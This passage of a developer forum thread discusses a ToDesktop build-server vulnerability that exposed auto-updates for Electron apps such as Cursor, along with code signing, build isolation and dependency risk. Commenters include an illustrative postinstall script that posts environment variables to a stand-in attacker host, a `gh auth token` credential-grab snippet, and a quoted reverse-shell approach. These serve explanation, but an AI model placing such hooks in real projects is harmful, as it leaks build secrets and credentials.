As an Electron maintainer, I'll reiterate a warning I've given many people before: Your auto-updater and the underlying code-signing and notarization mechanisms are sacred. The recovery mechanisms for the entire system are extremely painful and often require embarrassing emails to customers. A compromised code-sign certificate is close to the top of my personal nightmares.
Dave and toDesktop have built a product that serves many people really well, but I'd encourage everyone building desktop software (no matter how, with or without toDesktop!) to really understand everything involved in compiling, signing, and releasing your builds. In my projects, I often make an argument against too much abstraction and long dependency chains in those processes.
If you're an Electron developer (like the apps mentioned), I recommend:
* Build with Electron Forge, which is maintained by Electron and uses @electron/windows-sign and @electron/osx-sign directly. No magic. (A minimal config sketch follows this list.)
* For Windows signing, use Azure Trusted Signing, which signs just-in-time. That's relatively new and offers some additional recovery mechanisms in the worst case.
* You probably want to rotate your certificates if you ever gave anyone else access.
* Lastly, you should probably be the only one with the keys to your update server.
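For the Forge route recommended above, the signing and notarization hooks live in the packager config. A minimal sketch, not a drop-in config: the env var names are placeholders, and whether you need a `windowsSign` block at all depends on how your Azure Trusted Signing / signtool setup is wired up (that part is an assumption on my side).

```javascript
// forge.config.js — minimal sketch only
module.exports = {
  packagerConfig: {
    // macOS: signed via @electron/osx-sign, notarized via @electron/notarize
    osxSign: {},
    osxNotarize: {
      appleId: process.env.APPLE_ID,                        // placeholder env vars
      appleIdPassword: process.env.APPLE_APP_SPECIFIC_PASSWORD,
      teamId: process.env.APPLE_TEAM_ID,
    },
    // Windows: options here are handed to @electron/windows-sign
    windowsSign: {},
  },
  makers: [{ name: '@electron-forge/maker-zip', platforms: ['darwin', 'win32'] }],
};
```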
How about we don't build an auto-updater? Maybe some apps require an extremely tight coupling with a server, but we should try our best to release complete software to users that will work as close to forever as possible. Touching files on a user's system should be treated as a rare special occurrence. If a server is involved with the app, build a stable interface and think long and hard about every change. Meticulously version and maintain everything. If a server is involved, it is completely unacceptable for a server-side change to break an existing user's local application unless it is impossible to avoid - it should be seen as an absolute last resort with an apology to affected customers (agree with OP on this one).
It is your duty to make sure _all_ of your users are able to continue using the same software they installed in exactly the same way for the reasonable lifetime of their contract, the package, or underlying system (and that lifetime is measured in years/decades, with the goal of forever where possible. Not months).
You can, if you must, include an update notification, but this absolutely cannot disrupt the user's experience; no popups, do not require action, include an "ignore forever" button. If you have a good product with genuinely good feature improvements, users will voluntarily upgrade to a new package. If they don't, that is why you have a sales team.
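For what it's worth, a non-disruptive notice along those lines is only a handful of lines of Electron. A minimal sketch, assuming a recent Electron with global fetch; the release endpoint and the "ignore forever" marker file are hypothetical placeholders:

```javascript
const { app, Notification } = require('electron');
const fs = require('node:fs');
const path = require('node:path');

// Hypothetical marker file written when the user picks "ignore forever".
const ignoreFile = path.join(app.getPath('userData'), 'ignore-update-notices');

async function maybeMentionUpdate() {
  if (fs.existsSync(ignoreFile)) return; // user opted out, never ask again
  const res = await fetch('https://example.com/releases/latest.json'); // placeholder URL
  const { version } = await res.json();
  if (version === app.getVersion()) return;
  // Passive, dismissible notification; nothing is downloaded or installed.
  new Notification({
    title: 'A new version is available',
    body: `Version ${version} is available whenever you want it. No rush.`,
  }).show();
}

app.whenReady().then(maybeMentionUpdate);
```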
Additionally, more broadly, it is not your app's job to handle updates. That is the job of your operating system and its package manager. But I understand that Windows is behind in this regard, so it is acceptable to compromise there.
We go a step further at my company. Any customer is able to request any previous version of their package at any time, and we provide them an Internet download page or overnight ship them a CD free of charge (and now USB too).
> Maybe some apps require an extremely tight coupling with a server, but we should try our best to release complete software to users that will work as close to forever as possible.
That sounds like a good idea. Unless you’re the vendor, and instead of 1000 support requests for version N, you’re now facing 100 support requests for version N, 100 for N−1, 100 for N−2, …, and 100 for N−9.
Have been there, done that.
The answer is a support window. If they are in bounds and have active maintenance contracts, support them.
If not, give them an option to get on support, or wish them luck.
Then the other answer is to really think releases through.
None of it is cheap. But it can be managed.
You're allowed to have a support matrix. You can refuse to support versions that are too old, but you can also just... let people keep using programs on their own computers.
Yep.
And anyone who does will find a percentage of users figure it out and then just get back to work.
Sounds like you come from the B2B, consultancyware or 6+ figure/year license world.
For the vast realm of <$300/year products, the ones that actually use updaters, all your suggestions are completely unviable.
And it's not like B2B doesn't get whacked by bad software or bad actors regularly. The idea that software updates itself is vastly more beneficial than harmful in the very long term. There are so many old machines running outdated software in gated corporate networks; they will get owned immediately once a single one of them is compromised in any way. They are literally trading minor inconveniences for a massive time-bomb with a random timer.
The two sides of your thought are going head to head. "Gated corporate networks" don't benefit from software that "updates itself" (unless we're talking about pure SaaS). It's exactly where auto-updating is completely useless, because any company with a functioning IT department will go out of its way not to delegate decisions about when to update, or which features get forced in, to the developer and their product manager.
In practice, auto-updates mostly happen for software used at home or in SMBs which might not have a functioning IT department. If security is the concern, why not use auto-updates only for security updates? Why am I gaining features I explicitly did not want, or losing the ones which were the reason I bought the software in the first place? Why does the dev think I am not capable of deciding for myself if or when to update? I have a solid theory of why, and it involves an MBA-type person thinking anyone using <$300 software just can't think for themselves, and if this line of thought cuts some costs or generates some revenue, all the better.
> How about we don't build an auto-updater?
Sure. I’d rather have it be provided by the platform. It’s a lot of work to maintain for 5 OSs (3 desktop, 2 mobile).
> we should try our best to release complete software to users that will work as close to forever as possible
This isn’t feasible. Last I tried to support old systems on my app, the vendor (Apple) had stopped supporting and didn’t even provide free VMs. Windows 10 is scheduled for non-support this year (afaik). On Linux glibc or gtk will mess with any GUI app after a few years. If Microsoft, Google and Apple can’t, why the hell should I as a solo app developer? Plus, I have 5 platforms to worry about, they only have their own.
> Touching files on a user's system should be treated as a rare special occurrence.
Huh? That’s why I built an app and not a website in the first place. My app is networked both p2p and to api and does file transfers. And I’m supposed to not touch files?
> If a server is involved with the app, build a stable interface and think long and hard about every change.
Believe me, I do. These changes are as scary as database migrations. But like those, you can't avoid them forever. And for those cases, you need at the very least to let the user know what’s happening. That’s half of the update infrastructure.
Big picture, I can agree with the sentiment that ship fast culture has gone too far with apps and also we rely on cloud way too much. That’s what the local first movement is about.
At the same time, I disagree with the generalization seemingly based on a narrow stereotype of an app. For most non-tech users, non-disruptive background updates are ideal. This is what iOS does overnight when charging and on WiFi.
I have nothing against disabling auto updates for those who like to update their own software, but as a default it would lead to massive amounts of stale non-working software.
> file transfers. And I’m supposed to not touch files?
I'm pretty sure you know what I meant, it's obvious from context. System program files. The files that are managed by your user's package manager (and by extension their IT department)
There isn’t a package manager in many cases: windows store requires a MS account. macOS app store nerfs apps by sandbox restrictions. Linux has so many flavors of package managers it’s death by 1000 paper cuts. None of the major bundlers like flutter, electron and tauri support all these package managers and/or app stores. Let alone running the infrastructure for it.
Which leaves you with self-updaters. I definitely agree ideally it shouldn’t be the application's job to update itself. But we don’t live in that world atm. At the very least you need update checks and EOL circuit breakers for apps that aren’t forever, local-only apps. Which is not a niche use-case even if local-first infra was mature and widely adopted, which it very much isn’t.
Anyway, my app works without internet, pulls no business logic at runtime (live updates) and it uses e2ee for privacy. That’s way more than the average ad-funded bait-and-switch ware that plagues the majority of commercial software today. I wish I didn’t have to worry about updates, but the path to fewer worries and a healthy ecosystem is not to build bug-free forever-software on top of a constantly moving substrate provided largely by corporations with multiple orders of magnitude more funding than the average software development company.
I do agree with you but I think that unfortunately you are wrong on the job of updates. You have an idealistic vision that I share but well, it remains idealistic.
Apart from, maybe, Linux distros, neither Apple nor Microsoft provides anything to handle updates that isn’t a proprietary store with shitty rules.
For sure the rules are broken on desktop OSs, but in the meantime you still have to distribute and update your software. Should the update be automatic? No. Should you provide an easy way to update? I’d say that in the end it depends on whether you think it’s important to provide updates to your users. But should you expect your users or their OSs to somehow update your app by themselves? Nope.
This is actually precisely how package management works in Linux today... you release new versions, package maintainers package and release them, while ensuring they actually work. This is a solved problem, it's just that nobody writing JavaScript is old enough to realize it's an option.
And that's why I said "apart from Linux". Where are the package maintainers on the OSes everyone uses? (and don't think that's sarcasm, I'm writing this comment on my linux desktop).
Homebrew and chocolatey?
My exact thought as well, simply point the user to a well established and proper channel for auto updates and then the dev simply needs to upload/release to said repos when a new version is put out. As an aside: Chocolatey is currently the only (stable/solid) way to consistently keep things up to date on the Win platform in my book.
Windows Store and winget. Developers are the ones behind the times.
This one is right.
Have a shoe-box key, a key which is copied 2*N (redundancy) times and N copies are stored in 2 shoe-boxes. It can be on tape, or optical, or silicon, or paper. This key always stays offline. This is your rootiest of root keys in your products, and almost nothing is signed by it. The next key down which the shoe-box key signs (ideally, the only thing) is for all intents and purposes your acting "root certificate authority" key running hot in whatever highly secure signing enclave you design for any other ordinary root CA setup. Then continue from there.
Your hot and running root CA could get totally pwned, and as long as you had come to Jesus with your shoe-box key and religiously never ever interacted with it or put it online in any way, you can sign a new acting root CA key with it and sign a revocation for the old one. Then put the shoe-box away.
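A conceptual sketch of that two-tier arrangement, using bare ed25519 keys instead of real X.509 certificates (a deliberate simplification, not how any particular signing product works):

```javascript
const { generateKeyPairSync, sign, verify } = require('node:crypto');

// 1. The "shoe-box" root key: generated once, exported to offline media,
//    and never loaded on a networked machine again.
const root = generateKeyPairSync('ed25519');

// 2. The only thing the root ever signs: the public key of the acting "hot" CA.
const hotCA = generateKeyPairSync('ed25519');
const hotCAPub = hotCA.publicKey.export({ type: 'spki', format: 'der' });
const endorsement = sign(null, hotCAPub, root.privateKey);

// 3. Day-to-day releases are signed by the hot CA...
const release = Buffer.from('my-app-1.2.3.zip contents');
const releaseSig = sign(null, release, hotCA.privateKey);

// ...and clients check both links in the chain against the pinned root public key.
console.log(verify(null, hotCAPub, root.publicKey, endorsement)); // true
console.log(verify(null, release, hotCA.publicKey, releaseSig));  // true

// If the hot CA is ever compromised, the shoe-box key signs a replacement
// (and a revocation for the old one) and then goes back in the box.
```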
I mean sure, but is that possible for OS builds? Generally you will generate a private key, get a cert for it, give it to Apple so they sign it with their key, and then you use the private key to sign your build. I have never seen a guide do a two-level process and I am not convinced it is allowed.
2. Because that requires you to know how to find the hash and add it.
Truthfully the burden should be on the third party that's serving the script (where did you copy that HTML in the first place?) but they aren't incentivized to have other sites use a hash.
Well, to be honest, the browsers could super easily solve that. In dev mode, just issue a warning "loaded script that has hash X but isn't statically defined. This is a huge security risk. Read more here" and that's it. Then you can just add the script, run the site, check the logs and add the hash, done.
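For reference, "the hash" here is a standard subresource-integrity digest, and computing it is mechanical. A small sketch (Node 18+ for the global fetch; the URL is a placeholder):

```javascript
const { createHash } = require('node:crypto');

// SRI value = "<algorithm>-<base64 digest of the exact bytes served>"
async function sriFor(url) {
  const body = Buffer.from(await (await fetch(url)).arrayBuffer());
  return 'sha384-' + createHash('sha384').update(body).digest('base64');
}

// The resulting tag then looks like:
//   <script src="https://cdn.example.com/lib.js"
//           integrity="sha384-..." crossorigin="anonymous"></script>
sriFor('https://cdn.example.com/lib.js').then(console.log);
```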
There's plenty of magic. I think that Electron Forge does too many things, like trying to be the bundler. Is it possible to set up a custom build system / bundling with it or are you forced to use Vite? I guess that even if you can, you pull all those dependencies when you install it and naturally you can't opt out from that. Those dev dependencies involved in the build process are higher impact than some production dependencies that run in a sandboxed tab process (because a tiny malicious dependency could insert any code into the app's fully privileged process). I have not shipped my app yet, but I am betting on ESBuild (because it's just one Go binary) and Electron Builder (electron.build)
Azure Trusted Signing is one of the best things Microsoft has done for app developers last year, I'm really happy with it. It's $9.99/month and open both to companies and individuals who can verify their identity (it used to only be companies). You really just call signtool.exe with a custom dll.
The big limitation with Azure Trusted Signing is that your organization needs to be at least 3 years old. Seems to be a weird case where developers that could benefit from this solution are pushed towards doing something else, with no big reason to switch back later.
That limitation should go away when Trusted Signing graduates from preview to GA. The current limitation is because the CA rules say you must perform identity validation of the requester for orgs younger than 3 years old, which Microsoft isn't set up for yet.
I recently checked it out as an alternative to renewing our signing cert, but it doesn't support issuing EV certs.
I've understood it as having an EV code signing cert on Windows is required for drivers, but somehow also gives you better SmartScreen reputation making it useful even for user space apps in enterprisey settings?
Not sure if this is FUD spread by the EV CA's or not though?
And yet, tons of developers install github apps that ask for full permissions to control all repos and can therefore do the same things to every dev using those services.
github should be ashamed this possibility even exists and double ashamed that their permission system and UX is so poorly conceived that it leads apps to ask for all the permissions.
IMO, github should spend significant effort so that the default is to present the user with a list of repos they want some github integration to have permissions for, and then for each repo, the specific permissions needed. It should be designed so that minimal permissions are encouraged.
As it is, the path of least resistance for app devs is "give me root" and for users to say "ok, sure"
Why spend that effort when any code you run on your machine (such as dependency post-install scripts, or the dependencies themselves!) can just run `gh auth token` and grab a token for all the code you push up?
By design, the gh cli wants write access to everything on github you can access.
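To spell out why that's scary: any script that runs as your user, a dependency's postinstall included, can do something like this (a sketch, not code from the article):

```javascript
const { execSync } = require('node:child_process');

// If the gh CLI is logged in, this prints a token with the same broad access
// the CLI itself has — no prompt, no consent dialog.
const token = execSync('gh auth token', { encoding: 'utf8' }).trim();
// From here it could be sent anywhere and used against any repo you can push to.
```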
I personally haven't worked with many of the github apps that you seem to refer to but the few that I've used are only limited to access the specific repositories that I give and within those repositories their access control is scoped as well. I figured this is all stuff that can be controlled on Github's side. Am I mistaken?
This vulnerability was genuinely embarrassing, and I'm sorry we let it happen. After thorough internal and third-party audits, we've fundamentally restructured our security practices to ensure this scenario can't recur. Full details are covered in the linked write-up. Special thanks to Eva for responsibly reporting this.
> We resolved the vulnerability within 26 hours of its initial report, and additional security audits were completed by February 2025.
After reading the vulnerability report, I am impressed at how quickly you guys jumped on the fix, so kudos. Did the security audit lead to any significant remediation work? If you weren't following PoLP, I wonder what else may have been overlooked?
That was solid. Nice way to handle a direct personal judgement!
Not your first rodeo.
Another way is to avoid absolutes and ultimatums as aggressively as one should avoid personal judgements.
Better phrased as: "we did our best to prevent this scenario from happening again."
Fact is it just could happen! Nobody likes that reality, and overall when we think about all this stuff, networked computing is a sad state of affairs..
Best to just be 100 percent real about it all, if you ask me.
At the very least people won't nail you on little things, which leaves you something you may trade on when a big thing happens.
And yeah, this is unsolicited and worth exactly what you paid. Was just sharing where I ended up on these things in case it helps
If you think someone is obviously wrong, it might be worth pausing for a second and considering where you might just be referring to different things. Here, you seem to understand “this” to mean “a serious bug.” Since it’s obvious that a serious bug could happen, it seems likely that the author meant “this” to mean “the kind of bug that led to the breach we’re presently discussing.”
This is the wrong response, because that means that the learning would be lost. The security community didn't want that to happen when one of the CAs had a vulnerability, and we do not want it to happen to other companies. We want companies to succeed and get better; shaming doesn't help towards that. Learning the right lessons does, and resigning means that you are learning the wrong ones.
I suggest reading one or two of Sidney Dekker’s books, which are a pretty comprehensive takedown of this idea. If an organization punishes mistakes, mistakes get hidden, covered up, and become no less frequent.
> If you get a slap on the wrist, do you learn? No, you play it down.
Except Dave didn't play it down. He's literally taking responsibility for a situation that could have resulted in significantly worse consequences.
Instead of saying, "nothing bad happened, let's move on," he, and by extension his company, have worked to remedy the issue, do a write up on it, disclose the issue and its impact to users, and publicly apologize and hold themselves accountable. That right there is textbook engineering ethics 101 being followed.
Under what theory of psychology are you operating? This is along the same lines as the theory that punishment is an effective deterrent of crime, which we know isn’t true from experience.
> While I think that resigning is stupid here, asserting that "punishment doesn't deter crime" is just absurd. It does!
Punishment does not deter crime. The threat of punishment does to a degree.
IOW, most people will be unaware of a person being sent to prison for years until and unless they have committed a similar offense. But everyone is aware of repercussions possible should they violate known criminal laws.
Honestly I don't get why people are hating this response so much.
Life is complex and vulnerabilities happen. They quickly contacted the reporter (instead of sending email to spam) and deployed a fix.
> we've fundamentally restructured our security practices to ensure this scenario can't recur
People in this thread seem furious about this one and I don't really know why. Other than needing to unpack some "enterprise" language, I view this as "we fixed some shit and got tests to notify us if it happens again".
To everyone saying "how can you be sure that it will NEVER happen", maybe because they removed all full-privileged admin tokens and are only using scoped tokens? This is a small misdirection, they aren't saying "vulnerabilities won't happen", but "exactly this one" won't.
So Dave, good job to your team for handling the issue decently. Quick patches and public disclosure are also more than welcome. One tip I'd learn from this is to use less "enterprise" language in security topics (or people will eat you in the comments).
Point taken on enterprise language. I think we did a decent job of keeping it readable in our disclosure write-up but you’re 100% right, my comment above could have been written much more plainly.
Annual pen tests are great, but what are you doing to actually improve the engineering design process that failed to identify this gap? How can you possibly claim to be confident this won't happen again unless you myopically focus on this single bug, which itself is a symptom of a larger design problem?
These kinds of "never happen again" statements never age well, and make no sense to even put forward.
A more pragmatic response might look like: something similar can and probably will happen again, just like any other bugs. Here are the engineering standards we use ..., here is how they compare to our peers our size ..., here are our goals with it ..., here is how we know when to improve it...
With privileged access, the attackers can tamper with the evidence for repudiation, so although I'd say "nothing in the logs" is acceptable, not everyone may. These two attack vectors are part of the STRIDE threat modeling approach.
Sounds like it was handled better than the author's last article, where the Arc browser company initially didn't offer any bounty for a similar RCE, then awarded a paltry $2k after getting roasted, and finally bumped it up to $20k after getting roasted even more.
Well for one it was a gift so there is no valid contract right? There are no direct damages because there is nothing paid and nothing to refund. Wrt indirect damages, there's bound to be a disclaimer or two, at least at the app layer.
If you give someone a bomb, or give someone a USB stick with a virus, or give someone a car with defective brakes, you are absolutely liable. Think about it.
This is the second big attack found by this individual in what... 6 months? The previous exploit (which was in Arc browser), also leveraged a poorly configured firebase db: https://kibty.town/blog/arc/
So this is to say, at what point should we start pointing the finger at Google for allowing developers to shoot themselves in the foot so easily? Granted, I don't have much experience with firebase, but to me this just screams something about the configuration process is being improperly communicated or overall is just too convoluted as a whole.
Details like proper usage, security, etc. Those are often overlooked. Google isn't to blame if you ship a paid product without running a security audit.
I use firebase essentially for hobbyist projects for me and my friends.
If I had to guess these issues come about because developers are rushing to market. Not Google's fault ... What works for a prototype isn't production ready.
> Google isn't to blame if you ship a paid product without running a security audit.
Arguably, if you provide a service that makes it trivial to create security issues (that is to say, you have to go out of your way to use it correctly) then it's your fault. If making it secure means making it somewhat less convenient, it's 100% your fault for not making it less convenient.
What if I need to hack together a POC for 3 people to look at.
It's my responsibility to make sure when we scale from 3 users to 30k users we take security seriously.
As my old auto shop teacher used to say, if you try to idiot proof something they'll build a better idiot.
Even if Google warns you in big bold print "YOU ARE DOING SOMETHING INSECURE", someone out there is going to click deploy anyway. You're arguing Google disable the deploy button, which I simply disagree with.
I think that's throwing the baby out with the bathwater; sane defaults are still an important thing to think about when developing a product. And for something as important as a database, which usually requires authentication or storing personal information, let your tutorials focus on these pain points instead of the promise of a database-driven app with only clientside code. It's awesome, but I think it deserves the notoriety for letting you shoot yourself in the foot and landing on the front page of HN. Author also found a similar exploit via Firebase for the Arc Browser[0]
I don't know what exactly happened here, but Firebase has two defaults. Test access rules which auto expire and are insecure, or production rules which require auth.
If you do something stupid, like keep ignoring the insecure warning and updating them so they don't expire, that's your fault.
In no other industry do workers blame their tools.
The issue usually lies in there not being enough security rules in place, not in keeping insecure rules active. For instance, for the Arc incident which we were given more information on, it was due to not having a security rule in place to prevent unauthorized users from updating the user_id on Arc Boosts in the Firestore.
Go into any other industry and hear when they say, "shoot yourself in the foot", and you've likely stumbled upon a situation where they blame their tools for making it too easy to do the wrong thing.
If you don't setup any access rules in Firebase, by default it'll deny access.
This means someone setup these rules improperly. Even if, you're responsible for the tools you use. We're a bunch of people getting paid 150k+ to type. It's not out of the question to read documentation and at a minimum understand how things work.
That said I don't completely disagree with you, if Firebase enables reckless behavior maybe it's not a good tool for production...
And I don't necessarily disagree either; good callout that it _was_ about improperly configured ACL's, I meant more that it wasn't related to keeping test rules alive.
For 150k+ salaries, frontend dev salaries are generally a lot less than their backend counterparts. And scrappy startups might not have cash for competitive salaries or senior engineers. I think these are a few of the reasons why Firebase becomes dangerous.
Any purported expert who uses software without considering its security is simply negligent. I'm not sure why people are trying to spin this to avoid placing the blame on the negligent programmer(s).
Weak programmers do this to defend the group making crap software. I agree that defaults should be secure and maybe there should be a request limit on admin, full-access tokens - but then people will just create another token with full access and use it.
I’ve seen devs deploy production software with the admin password being “password”. I don’t think you are listening when they are saying “they’ll build a better idiot”.
That's why we don't have seatbelts or safety harnesses or helmets or RCDs. There's always going to be an idiot that drives without a seatbelt, so why bother at all, right?
The white house recently said a lot of things. But of all things, I don’t think they’re even qualified to have an opinion about software, or medical advice, or… well, anything that generally requires an expert.
I don't think Firebase is really at fault here—the major issue they highlighted is that the deployment pipeline uploaded the compiled artifact to a shared bucket from a container that the user controlled. This doesn't have anything to do with firebase—it would have been just as impactful if the container building the code uploaded it to S3 from the buildbot.
Agreed. I recently stumbled upon the fact that even Hacker News is using Firebase for exposing an API for articles. Caution should be taken when writing server-side software in general.
The problem is that if there is a security incident, basically nobody cares except for some of us here. Normal people just ignore it. Until that changes, nothing you do will change the situation.
I always find unbelievable how we NEVER hold developers accountable.
Any "actual" Engineer would be (at least the one signing off, but in software developers never sign off anything - and maybe that's the problem).
> update: cursor (one of the affected customers) is giving me 50k USD for my efforts.
Kudos to cursor for compensating here. They aren't necessarily obliged to do so, but doing so demonstrates some level of commitment to security and community.
"i wanted to get on the machine where the application gets built and the easiest way to do this would be a postinstall script in package.json, so i did that with a simple reverse shell payload"
Just want to make sure I understand this. They made a hello world app and submitted it to todesktop with a post install script that opened a reverse shell on the todesktop build machine? Maybe I missed it but that shouldn't be possible. Build machine shouldn't have outbound open internet access right?? Didn't see that explained clearly but maybe I'm missing something or misunderstanding.
In what world do you have a machine which downloads source code to build it, but doesn't have outbound internet access so it can't download source code or build dependencies?
Like, effectively the "build machine" here is a locked down docker container that runs "git clone && npm build", right? How do you do either of those activities without outbound network access?
And outbound network access is enough on its own to create a reverse shell, even without any open inbound ports.
The miss here isn't that the build container had network access, it's that the build container both ran untrusted code, and had access to secrets.
It's common, doesn't mean it's secure.
A lot of Linux distros, in their packaging, will separate download (which allows outbound access to fetch dependencies) from build (no outside access).
Unfortunately, in some ecosystems, even downloading packages using the native package managers is unsafe because of postinstall scripts or equivalent.
Even if your builders are downloading dependencies on the fly, you can and should force that through an artifact repository (e.g. artifactory) you control. They shouldn't need arbitrary outbound Internet access. The builder needs a token injected with read-only pull permissions for a write-through cache and push permissions to the path it is currently building for. The only thing it needs to talk to is the artifactory instance.
If you don't network isolate your build tooling then how do you have any confidence that your inputs are what you believe them to be? I run my build tools in a network namespace with no connection to the outside world. The dependencies are whatever I explicitly checked into the repo or otherwise placed within the directory tree.
You don't have any confidence beyond what lockfiles give you (which is to say the npm postinstall scripts could be very impure, non-hermetic, and output random strings). But if you require users to vendor all their dependencies, fully isolate all network traffic during build, be perfectly pure and reproducible and hermetic, presumably use nix/bazel/etc... well, you won't have any users.
If you want a perfectly secure system with 0 users, it's pretty easy to build that.
I'm not suggesting that a commercial service should require this. You asked "In what world do you have ..." and I'm pointing out that it's actually a fairly common practice. Particularly in any security conscious environment.
Anyone not doing it is cutting corners to save time, which to be clear isn't always a bad thing. There's nothing wrong if my small personal website doesn't have a network isolated fully reproducible build. On the other hand, any widely distributed binaries definitely should.
For example, I fully expect that my bank uses network isolated builds for their website. They are an absolutely massive target after all.
Most banks and larger enterprises do exactly this. Devs don't get to go out and pick random libraries without a code review, and then it's placed in a local repository.
There are just far too many insecure packages and typosquatted malware out there to pull things off the internet raw.
This is npm with all dependencies stored in a directory. Check them in. You do code review your dependencies right? Everywhere I’ve worked in the last 10 years has required this. There is no fetching of dependencies in builds. Granted, this is harder to pull off if your devs are developing on a totally different cpu architecture than production (fuck you apple).
There are plenty of worlds that take security more seriously and practice defense in depth. Your response could use a little less hubris and a more genuinely inquisitive tone. Looks like others have already chimed in here but to respond to your (what feels like sarcasm) questions:
- You can have a submission process that accepts a package or downloads dependencies, and then passes it to another machine that is on an isolated network for code execution / build which then returns the built package and logs to the network facing machine for consumption.
Now sure if your build machine is still exposing everything on it to the user supplied code (instead of sandboxing the actual npm build/make/etc.. command) you could insert malicious code that zips up the whole filesystem, env vars, etc.. and exfiltrates them through your built app in this case snagging the secrets.
I don't disagree that the secrets on the build machine were the big miss, but I also think designing the build system differently could have helped.
You have to meet your users where they are. Your users are not using nix and bazel, they're using npm and typescript.
If your users are using bazel, it's easy to separate "download" from "build", but if you're meeting your users over here where cows aren't spherical, you can't take security that seriously.
The simple solution would be to check your node_modules folder into source control. Then your build machine wouldn’t need to download anything from anywhere except your repository.
Isn't it really common for build machines to have outbound internet access? Millions of developers use GitHub Actions for building artifacts and the public runners definitely have outbound internet access
Indeed, you can indeed punch out from an actions runner. Such a thing is probably against GitHub's ToS, but I've heard from my third cousin twice removed that his friend once ssh'ed out from an action to a bastion host, then used port forwarding to get herself a shell on the runner in order to debug a failing build.
So this friend escaped from the ephemeral container VM into the build host which happened to have a private SSH on it that allowed it to connect to a bastion host to... go back to the build host and debug a failed build that should be self-contained inside the container VM which they already had access in the first place by the means of, you know, running a build on it? Interesting.
A few decades ago, it was also really common to smoke. Common != good, github actions isn't a true build tool, it's an arbitrary code runtime platform with a few triggers tied to your github.
It is. And regardless of a few other commenters saying or hinting that it isn't... it is. An air gapped build machine wouldn't work for most software built today.
Strange. How do things like Nix work then? The nix builders are network isolated. Most (all?) Gentoo packages can also be built without network access. That seems like it should cover a decent proportion of modern software.
Instances where an air gapped build machine doesn't work are examples of developer laziness, not bothering to properly document dependencies.
Ya too many people think it's a great idea to raw dog your ci/cd on the net and later get newspaper articles written about the data leak.
The number of packages that are malicious is high enough; then you have typo packages, and packages that get compromised at a later date. Being isolated from the net with proper monitoring gives a huge heads up when your build system suddenly tries to contact some random site/IP.
I'm a huge fan of the writing style. it's like hacking gonzo, but with literally 0 fluff. amazing work and an absolute delight to read from beginning to end
Obnoxious is a bit harsh - I liked the feeling it gave to the article, found it very readable and I had no trouble discerning sentences, especially with how they were broken up into paragraphs.
Yeah, it is their fault. I don't download "todesktop" (to-exploit), I download Cursor. Don't give 3rd parties push access to all your clients, that's crazy. How can this crappy startup build server sign a build for you? That's insane.
it blows me away that this is even a product. it's like a half day of dev time, and they don’t appear to have over-engineered it or even done basic things given the exploit here.
Software developers don't actually write software anymore, they glue together VC-funded security nightmares every 1-3 years, before moving on to the next thing. This goes on and on until society collapses under its own weight.
In my experience, blame for this basically never lies on grunt-level devs; it's EMs and CTOs/CIOs who insist on using third-party products for everything out of some misguided belief that it will save dev time and it's foolish to reinvent the wheel. (Of course, often figuring out how to integrate a third-party wheel, and maintain the integration, is predictably far more work for a worse result than making your own wheel in the first place, but I have often found it difficult to convince managers of this. In fairness, occasionally they're right and I'm wrong!)
With all due respect, a compile pipeline across Win, Mac, Linux, for different CPU architectures, making sure signing works for all, and that the Electron auto-updater works as expected is a nightmare. I have been there, and it’s not fun.
> i wanted to get on the machine where the application gets built and the easiest way to do this would be a postinstall script in package.json, so i did that with a simple reverse shell payload
From the ToDesktop incident report:
> This leak occurred because the build container had broader permissions than necessary, allowing a postinstall script in an application's package.json to retrieve Firebase credentials. We have since changed our architecture so that this can not happen again, see the "Infrastructure and tooling" and "Access control and authentication" sections above for more information about our fixes.
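In other words, the entire build-side half of the exploit can be as mundane as a postinstall hook like the following (a sketch; the endpoint is a placeholder, and the actual payload was a reverse shell rather than a blind POST):

```javascript
// package.json: "scripts": { "postinstall": "node scripts/postinstall.js" }
// scripts/postinstall.js:
const payload = JSON.stringify({
  env: process.env,   // any credentials injected into the build container
  cwd: process.cwd(),
});

// Node 18+ global fetch; fail silently so the build still looks healthy.
fetch('https://attacker.example/collect', { method: 'POST', body: payload })
  .catch(() => {});
```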
I'm curious to know what the trial and error here was to get their machine to spit out the build, or if it was done in one shot.
With the number of dependencies and dependency trees going multiple levels deep? Third-party risk is the largely unaddressed elephant in the room that companies don't care about.
- Paid operating system (RHEL) with a team of paid developers and maintainers verifying builds and dependencies.
- Empty dependencies. Only what the core language provides.
It's not that great of a sacrifice. Like $20/mo for the OS, and like 2 days of dev work, which pays for itself in the long run by avoiding a mass of code you don't understand.
"the build container now has a privileged sidecar that does all of the signing, uploading and everything else instead of the main container with user code having that logic."
Does this info about the fix seem alarming to anyone else? It's not a full description, so maybe some important details are left out? My understanding is that containers are generally not considered a secure enough boundary. Companies such as AWS use micro VMs (Firecracker) for secure multi tenant container workloads.
Oof. I already have enough stress with my own autoupdating, single-file remote access tool I run on all of my computers, given that a small part of the custom OTA mechanism's security is by obscurity. Would make sleeping hard owning something as popular as this.
I’d like to see some thoughts on where we go from here. Is there a way we can keep end users protected even despite potential compromise of services like ToDesktop?
(eg: companies still hosting some kind of integrity checking service themselves and the download is verified against that… likely there’s smarter ideas)
The user experience of auto-update is great, but having a single fatal link in the chain seems worrying. Can we secure it better?
Ironically, it actually helped me stay focused on the article. Kind of like a fidget toy. When part of my brain would get bored, I could just move the cat and satisfy that part of my brain while I keep reading.
I know that sounds kind of sad that my brain can't focus that well (and it is), but I appreciated the cat.
We have reviewed logs and inspected app bundles. No malicious usage was detected. There were no malicious builds or releases of applications from the ToDesktop platform.
Is there an easy way to validate the version of Cursor one is running against the updated version by checking a hash or the like?
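Not a complete answer, but if the vendor publishes per-release checksums you can at least compare the binary you're running against them. A sketch (the path is just an example, and the existence of published checksums is an assumption):

```javascript
const { createHash } = require('node:crypto');
const { createReadStream } = require('node:fs');

function sha256(file) {
  return new Promise((resolve, reject) => {
    const hash = createHash('sha256');
    createReadStream(file)
      .on('data', (chunk) => hash.update(chunk))
      .on('end', () => resolve(hash.digest('hex')))
      .on('error', reject);
  });
}

// Example path on macOS; compare the output against a vendor-published checksum.
sha256('/Applications/Cursor.app/Contents/MacOS/Cursor').then(console.log);
```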
The javascript world has a culture of lots of small dependencies that end up becoming a huge tree no one could reasonably vendor or audit changes for. Worse, these small dependencies churn much faster than in other languages.
With that culture supply chain attacks and this kind of vulnerability will keep happening a lot.
You want few dependencies, you want them to be widely used and you want them to be stable. Pulling in a tree of modules to check if something is odd or even isn't a good idea.
As usual, I read the comments here first. I'm glad I read the article though because the comments here have pretty much nothing to do with the vulnerability. Here's a summary because the article actually jumps over explaining the vulnerability in the gap between two paragraphs:
